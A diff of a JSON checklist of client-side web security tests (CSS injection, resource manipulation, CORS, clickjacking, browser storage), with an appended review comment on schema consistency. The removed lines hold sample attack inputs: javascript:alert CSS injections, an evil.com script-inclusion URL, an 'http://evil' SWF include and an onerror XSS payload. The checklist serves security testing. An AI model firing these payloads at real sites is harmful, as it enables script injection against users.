988
  {
809
989
  "key": "css_injection",
810
990
  "title": "Testing for CSS Injection",
811
991
  "caption": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
812
- "description": "nject code in the CSS context :\nwww.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])\nwww.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)",
813
- "tools": "Burp Proxy, ZAP",
992
+ "description": "Analyze CSS handling for vulnerabilities allowing injection of malicious styles to alter page rendering or extract sensitive information.",
993
+ "tools": "Browser, Burp Suite, ZAP",
814
994
  "vrt_category": "server_security_misconfiguration"
815
995
  },
816
996
  {
817
997
  "key": "resource_manipulation",
818
998
  "title": "Testing for Client Side Resource Manipulation",
819
999
  "caption": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
820
- "description": "External JavaScript could be easily injected in the trusted web site\nwww.victim.com/#http://evil.com/js.js",
821
- "tools": "Burp Proxy, ZAP",
1000
+ "description": "Assess the application's resilience against attacks that involve manipulating client-side resources to achieve malicious outcomes.",
1001
+ "tools": "Browser, Burp Suite, ZAP",
822
1002
  "vrt_category": "server_security_misconfiguration"
823
1003
  },
824
1004
  {
825
1005
  "key": "cors",
826
- "title": "Test Cross Origin Resource Sharing",
1006
+ "title": "Testing Cross-Origin Resource Sharing",
827
1007
  "caption": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
828
- "description": "Check the HTTP headers in order to understand how CORS is used (Origin Header)",
829
- "tools": "Burp Proxy, ZAP",
830
- "vrt_category": "server_security_misconfiguration"
831
- },
832
- {
833
- "key": "cross_site_flashing",
834
- "title": "Testing for Cross Site Flashing",
835
- "caption": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
836
- "description": "Decompile, Undefined variables, Unsafe methods, Include malicious SWF http://victim/file.swf?lang=http://evil",
837
- "tools": "FlashBang, Flare, Flasm, SWFScan, SWF Intruder",
1008
+ "description": "Verify proper CORS configuration to prevent unauthorized cross-domain data access.",
1009
+ "tools": "Browser, Burp Suite, ZAP",
838
1010
  "vrt_category": "server_security_misconfiguration"
839
1011
  },
840
1012
  {
841
1013
  "key": "clickjacking",
842
1014
  "title": "Testing for Clickjacking",
843
1015
  "caption": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
844
- "description": "Discover if a website is vulnerable by loading into an iframe, create a simple web page that includes a frame containing the target.",
845
- "tools": "Burp Proxy",
1016
+ "description": "Determine if the website implements sufficient client-side defenses (e.g., X-Frame-Options, Content-Security-Policy) to prevent rendering within a frame controlled by a malicious site.",
1017
+ "tools": "Browser, Burp Suite, ZAP",
846
1018
  "vrt_category": "server_security_misconfiguration"
847
1019
  },
848
1020
  {
849
1021
  "key": "web_sockets",
850
1022
  "title": "Testing WebSockets",
851
1023
  "caption": "OTG-CLIENT-010, WAHHM - Test Handling of Input",
852
- "description": "Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.\nUse Google Chrome's Developer Tools to view the Network WebSocket communication.\nCheck Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization",
853
- "tools": "Burp Proxy, Chrome, ZAP, WebSocket Client"
1024
+ "description": "Check WebSocket endpoints by inspecting ws:// or wss:// URI scheme for proper authorization and data handling.",
1025
+ "tools": "Burp Suite, wscat, wssip, ZAP"
854
1026
  },
855
1027
  {
856
1028
  "key": "web_messaging",
857
- "title": "Test Web Messaging",
1029
+ "title": "Testing Web Messaging",
858
1030
  "caption": "OTG-CLIENT-011, WAHHM - Test Handling of Input",
859
- "description": "Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains",
860
- "tools": "Burp Proxy, ZAP"
1031
+ "description": "Evaluate JavaScript Web Messaging implementation, focusing on validation of origin restrictions and secure data processing, including trusted domains.",
1032
+ "tools": "Browser, Burp Suite, ZAP"
861
1033
  },
862
1034
  {
863
- "key": "local_storage",
864
- "title": "Test Local Storage",
1035
+ "key": "browser_storage",
1036
+ "title": "Testing Browser Storage",
865
1037
  "caption": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
866
- "vrt_category": "server_security_misconfiguration",
867
- "description": "Determine whether the website is storing sensitive data in the storage.\nXSS in localstorage http://server/StoragePOC.html#<img src=x onerror=alert(1)>",
868
- "tools": "Chrome, Firebug, Burp Proxy, ZAP"
1038
+ "description": "Evaluate the secure implementation and appropriate use of browser storage mechanisms (LocalStorage, SessionStorage, IndexedDB, Cookies) to prevent unauthorized access and data leakage.",
1039
+ "tools": "Browser"
1040
+ },
1041
+ {
1042
+ "key": "script_inclusion",
1043
+ "title": "Testing for Cross-Site Script Inclusion",
1044
+ "caption": "OTG-CLIENT-013",
1045
+ "description": "Verify the application's resistance to the inclusion of malicious, externally hosted JavaScript code within its execution context.",
1046
+ "tools": "Browser, Burp Suite, ZAP"
1047
+ },
1048
+ {
1049
+ "key": "outdated_javascript",
1050
+ "title": "Testing for Outdated JavaScript Dependency",
1051
+ "caption": "",
1052
+ "description": "Identify and assess outdated JavaScript dependencies for known vulnerabilities.",
1053
+ "tools": "BuiltWith, retire.js, Wappalyzer"
1054
+ },
1055
+ {
1056
+ "key": "dependency_confusion",
1057
+ "title": "Testing for Dependency Confusion",
1058
+ "caption": "",
1059
+ "description": "Validate that the application's build process and package manager are configured to exclusively source internal dependencies from trusted, private registries, mitigating dependency confusion vulnerabilities.",
1060
+ "tools": "confused, gau, snync, waybackurls"
869
1061
  }
870
1062
  ]
871
1063
  },
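Review bot: The renamed `browser_storage` item drops the `"vrt_category": "server_security_misconfiguration"` line that the old `local_storage` entry carried (removed at old line 866), so this step no longer maps to a VRT category and a consumer reading `vrt_category` will find the key absent here while the other pre-existing items in this hunk keep it. The three newly added items (`script_inclusion`, `outdated_javascript`, `dependency_confusion`) and the untouched `web_sockets`/`web_messaging` entries also lack the key, so the `items` array now has a mixed element schema; re-adding `"vrt_category": "server_security_misconfiguration"` to `browser_storage` restores the previous mapping, and the new items presumably warrant a category as well, though which one cannot be told from the diff. Minor consistency points: the new items use `"caption": ""` where no OTG reference exists, whereas every other caption in the hunk carries a value, so either omitting the key or documenting the empty string as the "no reference" value would be clearer; `script_inclusion`'s caption `"OTG-CLIENT-013"` lacks the `, WAHHM - …` suffix all sibling captions carry, and `resource_manipulation`'s title keeps "Client Side" unhyphenated while the sibling titles were changed to "Client-Side".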